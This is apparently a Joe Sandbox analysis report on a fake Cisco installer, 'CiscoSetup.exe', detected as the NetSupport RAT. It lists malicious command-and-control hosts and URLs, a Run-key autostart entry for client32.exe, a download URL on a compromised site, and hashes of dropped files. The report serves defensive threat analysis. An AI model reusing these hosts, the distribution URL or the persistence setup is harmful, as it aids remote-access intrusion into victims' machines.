                                                                                                https://www.cisco.com/updateCiscoSetup.exe, 00000000.00000003.2546263258.0000000003131000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CC1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.microsoft.powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://curl.se/docs/alt-svc.htmlis-2J155.tmp.2.drfalse
                                                                                                    		unknown
                                                                                                    http://127.0.0.1client32.exe, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://www.immunet.comAbyCiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.symauth.com/cps0(powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://curl.se/docs/copyright.htmlDis-2J155.tmp.2.drfalse
                                                                                                            		unknown
                                                                                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.symauth.com/rpa00powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://www.iminunet.comCiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.immunet.comis-707KS.tmp.2.dr, is-V7509.tmp.2.drfalse
                                                                                                                		unknown
                                                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.00000000053B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.cisco.com0is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drfalse
                                                                                                                  		unknown
                                                                                                                  http://relaxng.org/ns/structure/1.0is-2TJID.tmp.2.drfalse
                                                                                                                    		unknown
                                                                                                                    https://www.cisco.com/supportQyCiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CC1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.cisco.com/supportCiscoSetup.exe, 00000000.00000003.2546263258.0000000003131000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://curl.se/Vis-2J155.tmp.2.drfalse
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          104.26.1.231
                                                                                                                          		geo.netsupportsoftware.comUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          151.236.16.15
                                                                                                                          		payiki.comEuropean Union
                                                                                                                          		29802HVC-ASUStrue
                                                                                                                          199.188.200.195
                                                                                                                          		anyhowdo.comUnited States
                                                                                                                          		22612NAMECHEAP-NETUStrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1546660
                                                                                                                          Start date and time:2024-11-01 12:10:11 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 12m 3s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:12
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:CiscoSetup.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal54.rans.troj.evad.winEXE@10/537@3/3
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 72%
                                                                                                                          • Number of executed functions: 191
                                                                                                                          • Number of non-executed functions: 219
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3412 because it is empty
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                          • VT rate limit hit for: CiscoSetup.exe

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          07:11:27API Interceptor19x Sleep call for process: powershell.exe modified
                                                                                                                          07:12:01API Interceptor15383830x Sleep call for process: client32.exe modified
                                                                                                                          12:11:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                          12:11:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\Cisco\client32.exe

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          104.26.1.231Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                          151.236.16.15Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                          199.188.200.195Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • http://199.188.200.195/fakeurl.htm

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          payiki.comAdvanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 151.236.16.15
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 151.236.16.15
                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 151.236.16.15
                                                                                                                          geo.netsupportsoftware.comAdvanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 104.26.1.231
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 104.26.1.231
                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 172.67.68.212
                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • 172.67.68.212
                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • 104.26.1.231
                                                                                                                          https://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                                                                                          • 104.26.0.231
                                                                                                                          https://inspyrehomedesign.comGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • 172.67.68.212
                                                                                                                          https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • 172.67.68.212
                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • 172.67.68.212
                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                          • 104.26.0.231
                                                                                                                          anyhowdo.comAdvanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 199.188.200.195
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 199.188.200.195
                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 199.188.200.195

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          NAMECHEAP-NETUSNF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 162.0.231.203
                                                                                                                          FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.192.21.169
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 199.188.200.195
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 199.188.200.195
                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 199.188.200.195
                                                                                                                          https://saniest.com/PO/PO%20-%20OCT.'24673937.rarGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.0.232.202
                                                                                                                          #U2749Factura_#U2749_#U2462#U2465#U2460#U2463#U2463#U2460#U2462#U2461.htaGet hashmaliciousUnknownBrowse
                                                                                                                          • 68.65.122.45
                                                                                                                          #U2749Factura_#U2749_#U2466#U2461#U2466#U2462#U2467#U2465#U2465#U2465.htaGet hashmaliciousUnknownBrowse
                                                                                                                          • 68.65.122.45
                                                                                                                          672365339196e.vbsGet hashmaliciousUnknownBrowse
                                                                                                                          • 68.65.122.45
                                                                                                                          18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 162.0.231.203
                                                                                                                          HVC-ASUSAdvanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 151.236.16.15
                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 151.236.16.15
                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                          • 151.236.16.15
                                                                                                                          PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                          • 23.227.202.197
                                                                                                                          IGNM2810202400017701_270620240801_546001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 66.206.22.19
                                                                                                                          https://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=scGet hashmaliciousUnknownBrowse
                                                                                                                          • 69.46.1.10
                                                                                                                          nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 23.227.187.69
                                                                                                                          splmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 172.110.9.223
                                                                                                                          jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 149.255.39.213
                                                                                                                          kkkmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.156.53.55
                                                                                                                          CLOUDFLARENETUSAlvise Maria CV 1.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          Action Desk Support 01 Nov.msgGet hashmaliciousUnknownBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          https://www.cognitoforms.com/f/wAh1CzXrnEmEifrmJ4OEgg/1Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                          • 104.17.24.14
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.85.194
                                                                                                                          kill.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.26.13.205
                                                                                                                          http://edgeupgrade.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.22.48.74
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          https://pcapp.store/pixel.gifGet hashmaliciousUnknownBrowse
                                                                                                                          • 172.67.15.14
                                                                                                                          draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 172.67.131.32

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                            SecureClientInstaller.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                              SecureClientInstaller.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-Q7F68.tmphttps://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                  SecureClientInstaller.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                    SecureClientInstaller.exeGet hashmaliciousNetSupport RATBrowse

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-Q7F68.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4467816
                                                                                                                                      Entropy (8bit):6.598146073323608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                      MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                      SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                      SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                      SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: , Detection: malicious, Browse
                                                                                                                                      • Filename: SecureClientInstaller.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: SecureClientInstaller.exe, Detection: malicious, Browse
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4467816
                                                                                                                                      Entropy (8bit):6.598146073323608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                      MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                      SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                      SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                      SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: , Detection: malicious, Browse
                                                                                                                                      • Filename: SecureClientInstaller.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: SecureClientInstaller.exe, Detection: malicious, Browse
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):562280
                                                                                                                                      Entropy (8bit):5.250676972668652
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:E51t8uFDD2edf0sC3Yeba96ga8nXNBZeph17:O12uR2ec3Yijg/dB4ph17
                                                                                                                                      MD5:A942F7085CF6E0584943727A7B804342
                                                                                                                                      SHA1:C79F5A2946400942F75BB6D05A853D4018ED7419
                                                                                                                                      SHA-256:AB1ABBFB3F0AD6A0E16F8FC94F485C67A8AB002A5C05549CF676E4D701E26FF0
                                                                                                                                      SHA-512:69D42640785AA0B4FABBADD894A92643B4D32BC6FB404B0CCC0B056D8413ABD3684D81BED43D10CED24620BF26A749B4F87A557916F987501986DCA9980C0F44
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.Dz=.*)=.*)=.*)).)(6.*))./(..*))..(/.*)o..(,.*)o.)(,.*)o./(..*)..+(9.*)).+(6.*)=.+)..*)..#(8.*)...)<.*)=..)<.*)..((<.*)Rich=.*)................PE..L......d.....................P......0 ....... ....@.......................................@............................................x............L..hH..............T...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1134696
                                                                                                                                      Entropy (8bit):5.98101366214949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:8h0jAkQkbL6TwyIHQ6KkuD/wNo9beiC3Yeba96ga8nXNBZy:8hAA7kbL6TwyIHQZ/wNf3Yijg/dBU
                                                                                                                                      MD5:5E20E06C6F8A52DF2A20F24BF8E7ED28
                                                                                                                                      SHA1:F43253FC29F72A6792A49F8499C8547328CB3060
                                                                                                                                      SHA-256:B2628E6B3620070511BC7BFD7EC75BF30F194D69560DC4925A2CB208EBFF8EA5
                                                                                                                                      SHA-512:06733AA3684278AD1E00F0F7070BED46698422104AA89E3563154A6477186F0DC34B4C6598B101941AB9C34055891CA1A697B8F233156953D09A184291018CBD
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#...g..Yg..Yg..Ys..Xl..Ys..Xt..Ys..X...Y5..Xv..Y5..Xm..Y5..X5..Ys..Xl..Yg..Y...Y...Xk..Y...Yf..Yg.nYf..Y...Xf..YRichg..Y........PE..d......d.........."..........P.......^.........@.............................p............`................................................. ...x............0..03......hH...0...5..(...T.......................(.......8............................................text...|........................... ..`.rdata..............................@..@.data....1..........................@....pdata..03...0...4..................@..@_RDATA.......p......................@..@.rsrc................0..............@..@.reloc...5...0...6..................@..B........................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Install\Component\acsock64.json (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):297
                                                                                                                                      Entropy (8bit):4.260838473974518
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3FHGzEGBX2WemHRSaiHaXQ0GshjQUoWyvNHiRCIrSa7V:1HTGBGXmHgak2uEiWygRgiV
                                                                                                                                      MD5:05BADC48F12BCC4CBF5B463321943D98
                                                                                                                                      SHA1:071138B7F1FFB97147891BA5A59C3C3B69FE4BD2
                                                                                                                                      SHA-256:9158CA8F1ECE84B45A80B9D43409A528B7D0493F38916A030876D70767C13630
                                                                                                                                      SHA-512:C1A0F2077676C37AD4B1AD5EAF4AB86BC9C516C82AD515B9A7E7A2A90D70080B2BC7CCC5E37C60F6C2D6A19775769AA8F610A91AFC1EE9F6358F941CF87976AD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "component" : [.. {.. "architecture" : "x86_64",.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "platform" : "windows",.. "type" : "component",.. "version" : "5.0.04021".. }.. ]..}..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Install\Component\is-RTTOC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):297
                                                                                                                                      Entropy (8bit):4.260838473974518
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3FHGzEGBX2WemHRSaiHaXQ0GshjQUoWyvNHiRCIrSa7V:1HTGBGXmHgak2uEiWygRgiV
                                                                                                                                      MD5:05BADC48F12BCC4CBF5B463321943D98
                                                                                                                                      SHA1:071138B7F1FFB97147891BA5A59C3C3B69FE4BD2
                                                                                                                                      SHA-256:9158CA8F1ECE84B45A80B9D43409A528B7D0493F38916A030876D70767C13630
                                                                                                                                      SHA-512:C1A0F2077676C37AD4B1AD5EAF4AB86BC9C516C82AD515B9A7E7A2A90D70080B2BC7CCC5E37C60F6C2D6A19775769AA8F610A91AFC1EE9F6358F941CF87976AD
                                                                                                                                      Malicious:false
